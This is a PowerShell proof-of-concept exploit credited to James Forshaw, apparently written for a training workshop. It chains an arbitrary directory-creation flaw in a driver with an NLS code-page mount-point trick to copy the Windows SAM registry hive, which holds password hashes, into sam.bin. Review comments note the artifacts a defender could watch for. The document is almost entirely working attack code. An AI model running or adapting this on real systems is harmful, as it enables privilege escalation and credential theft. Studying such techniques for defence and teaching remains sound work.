# Simple example when combined with an arbitrary directory creation | |
# vulnerability to read out the SAM registry hive file. | |
# Written by James Forshaw 2017 | |
Import-Module NtObjectManager | |
# Get an IOCTL for the workshop driver. | |
function Get-DriverIoCtl {
    <#
    .SYNOPSIS
    Builds the NtIoControlCode for one of the workshop driver's control codes.
    .PARAMETER ControlCode
    Driver-specific function number. It is OR-ed with 0x800 (the start of the
    vendor-defined function range) before being wrapped in the IOCTL.
    .OUTPUTS
    NtApiDotNet.NtIoControlCode with device type "Unknown", transfer method
    "Buffered" and required access "Any".
    #>
    param([int]$ControlCode)

    $functionCode = 0x800 -bor $ControlCode
    return [NtApiDotNet.NtIoControlCode]::new("Unknown", $functionCode, "Buffered", "Any")
}
function New-Directory {
    <#
    .SYNOPSIS
    Asks the workshop driver to create a directory at the given path.
    .PARAMETER Filename
    Path to create. It is handed to the driver as a UTF-16LE byte buffer
    (the driver, not this script, interprets the path).
    .NOTES
    Uses the driver's control code 2 (ControlCreateDir). The IOCTL's output
    buffer is requested with size 0 and the result is discarded.
    #>
    param([string]$Filename)

    Use-NtObject($device = Get-NtFile \Device\WorkshopDriver) {
        $createDirIoctl = Get-DriverIoCtl -ControlCode 2
        $inputBuffer = [Text.Encoding]::Unicode.GetBytes($Filename)
        $null = $device.DeviceIoControl($createDirIoctl, $inputBuffer, 0)
    }
}
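function Remove-Directory {
    <#
    .SYNOPSIS
    Best-effort removal of a directory (or directory reparse point) by name.
    .PARAMETER Filename
    NT path of the directory to delete.
    .NOTES
    Opens the path with Delete access and DeleteOnClose, so the object is
    removed when Use-NtObject closes the handle. OpenReparsePoint makes the
    open act on a mount point itself rather than on its target.
    Failures (typically "not found" on the pre-run cleanup call) are
    deliberately non-fatal because the caller uses this both before and after
    its main work; they are reported on the verbose stream instead of being
    dropped silently, so a teardown that did not happen is still visible
    with -Verbose.
    #>
    param([string]$Filename)

    try {
        Use-NtObject($dir = Get-NtFile $Filename `
            -Access Delete `
            -Options DeleteOnClose,OpenReparsePoint,DirectoryFile) {
        }
    } catch {
        # Intentional best-effort: never abort the caller, but do not hide it.
        Write-Verbose "Remove-Directory ${Filename}: $_"
    }
}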
# Main sequence. The steps are strictly ordered: the directory must exist and
# be turned into a mount point before the NLS section is mapped, and the
# section must be made temporary before the directory is torn down.
# NOTE(review): from a defender's view the artifacts this leaves are the
# directory/mount point at the c_1337.nls path below and the named section
# \nls\NlsSectionCP1337; both are worth watching for on a host.
try {
    # Path the NLS loader associates with code page 1337 (see the
    # GetNlsSectionPtr / NlsSectionCP1337 references below). Presumably no real
    # code page 1337 file ships, so the name is unused — confirm on the target.
    $dir = "\SystemRoot\system32\c_1337.nls"
    # Best-effort cleanup of a leftover from an earlier run; Remove-Directory
    # swallows failures such as "not found".
    Remove-Directory $dir
    # Create the directory through the workshop driver's IOCTL.
    New-Directory $dir
    # Set directory as a mount point to the SAM hive file: the new directory
    # becomes a junction whose substitute and print names are both the SAM path.
    $target_path = "\SystemRoot\system32\config\SAM"
    Use-NtObject($file = Get-NtFile $dir -Options OpenReparsePoint,DirectoryFile) {
        $file.SetMountPoint($target_path, $target_path)
    }
    # Map the NLS section for code page 1337 and copy its contents to sam.bin in
    # the current directory.
    # NOTE(review): [IO.File]::OpenWrite does not truncate an existing file, so a
    # stale, longer sam.bin would keep its trailing bytes; Create would give a
    # clean copy — confirm which behaviour is intended.
    Use-NtObject($map = [NtApiDotNet.NtLocale]::GetNlsSectionPtr("CodePage", 1337)) {
        Use-NtObject($output = [IO.File]::OpenWrite("sam.bin")) {
            $map.GetStream().CopyTo($output)
            Write-Host "Copied file"
        }
    }
    # Delete the named section object: MakeTemporary clears its permanent flag
    # so it goes away once its handles (including this one) are closed.
    Use-NtObject($sect = Get-NtSection \nls\NlsSectionCP1337 `
        -Access Delete) {
        $sect.MakeTemporary()
    }
    # Tear down the directory / mount point created above.
    Remove-Directory $dir
} catch {
    # Write-Host prints to the host only: nothing reaches the error stream and
    # the script's exit status stays 0, so a caller cannot tell that it failed.
    Write-Host $_
}
In line 1, 'direction' should be 'directory', I believe.